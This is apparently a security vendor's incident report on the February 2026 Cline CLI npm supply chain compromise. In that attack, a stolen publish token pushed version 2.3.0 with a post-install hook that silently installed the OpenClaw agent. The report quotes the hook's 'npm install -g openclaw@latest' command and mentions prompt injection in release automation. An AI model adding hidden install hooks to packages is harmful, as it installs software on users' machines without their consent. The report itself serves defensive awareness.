Cline CLI Supply Chain Attack Installs OpenClaw

Key Takeaways

• Attackers used a compromised npm publish token to release Cline CLI version 2.3.0 with an unauthorized post-install hook.
• The modified release silently installed the open-source autonomous AI agent OpenClaw on affected systems.
• The malicious version remained available for approximately eight hours, with around 4,000 downloads before removal.
• Cline maintainers revoked the compromised token and released version 2.4.0 with OIDC publishing hardening.
• OpenClaw itself was not malicious, but the unauthorized installation demonstrates the risk of supply chain compromise in AI tooling.

Supply Chain Attack Delivers AI Agent via Cline CLI

On February 17, 2026, an unauthorized actor used a stolen npm publish token to upload a tampered version of the open-source Cline CLI (version 2.3.0) to the npm registry. Users who installed or upgraded to this release had the OpenClaw autonomous AI agent automatically installed on their systems due to a malicious post-install script added to the package. Reporting indicates the compromised release was available for approximately eight hours and was downloaded an estimated 4,000 times before it was deprecated and replaced by version 2.4.0. (Cyber Security News)

Cline CLI is a widely adopted open-source AI coding assistant that integrates AI models into developer workflows. OpenClaw is an autonomous AI agent capable of executing tasks via LLM backends, and while not classified as malware, its silent installation highlights emerging risks as AI agents proliferate throughout development ecosystems.

How the Breach Happened

The actor exploited a compromised npm publish token associated with the Cline project to push an unauthorized release to npm. Rather than altering the core CLI binary, the attacker added a post-install script to the package.json that executed:

npm install -g openclaw@latest

This script caused OpenClaw to be globally installed when a developer ran npm install cline@2.3.0. The remainder of the package was otherwise identical to legitimate code.

The root of the compromise has been linked to earlier prompt injection research that exposed weaknesses in automated workflows processing issue titles, though the precise chain of exploitation remains under investigation. Prompt injection and automation configuration issues can allow attackers to escalate from untrusted input to production deployment keys when governance controls are insufficient. (The Verge)

Cline maintainers responded by revoking the compromised publish token, deprecating the malicious release, and updating the npm publishing pipeline to use OpenID Connect (OIDC) provenance via GitHub Actions to improve artifact trust verification.

Why It Matters

This incident demonstrates how software supply chain attacks can propagate AI agents unintentionally through trusted developer tooling. A compromised publishing credential bypassed standard release safeguards to install an autonomous agent on developer machines and potentially build pipelines. Autonomous AI agents such as OpenClaw can have broad permissions and persistent execution capability, making unauthorized presence a potential vector for elevated risk.

Although this specific instance did not involve destructive payloads, the event reveals how agent installation can occur without user intent, underscoring the importance of securing release credentials and verifying artifact provenance. Supply chain attacks in AI contexts can blend classical vulnerabilities with new vectors like prompt injection and automation trust assumptions, increasing both complexity and potential impact.

PointGuard AI Perspective

The Cline CLI supply chain attack underscores why AI discovery and supply chain visibility are critical for securing AI-assisted development environments and the broader software ecosystem.

PointGuard AI continuously discovers AI tools, agents, and integrations across development pipelines, third-party services, and build workflows. By generating an AI Bill of Materials (AI-BOM) that includes autonomous agents, package managers, and agentic tooling, organizations gain actionable visibility into where untrusted or unauthorized AI components may infiltrate critical systems.

Identifying where AI assistants operate with elevated privilege and interact with automated release processes enables proactive governance, artifact verification, and remediation before unauthorized AI agent installation translates into broader compromise. The Cline incident amplifies the need for provable provenance, credential hygiene, and deterministic supply chain controls as part of any secure AI adoption strategy.

Incident Scorecard Details

Total AISSI Score: 7.1 / 10

Criticality = 7 — Unauthorized AI agent installation through trusted developer tooling.
Propagation = 7 — The supply chain exploit spread through npm registry and developer environments.
Exploitability = 6 — Exploitation occurred over a brief window with a known compromised token.
Supply Chain = 8 — Critical dependency on npm publishing credentials and lack of strong artifact provenance.
Business Impact = 6 — No destructive payload, but persistent AI agent installation raises risk exposure.

Sources

Dark Reading
Supply chain attack secretly installs OpenClaw for Cline users. (Dark Reading)

CybersecurityNews
AI Dev Tool Cline’s npm Token Hijacked by Hackers. (Cyber Security News)

Awesome Agents / Cline CLI compromise coverage. (Awesome Agents)

OpenClaw background (autonomous AI agent). (Wikipedia)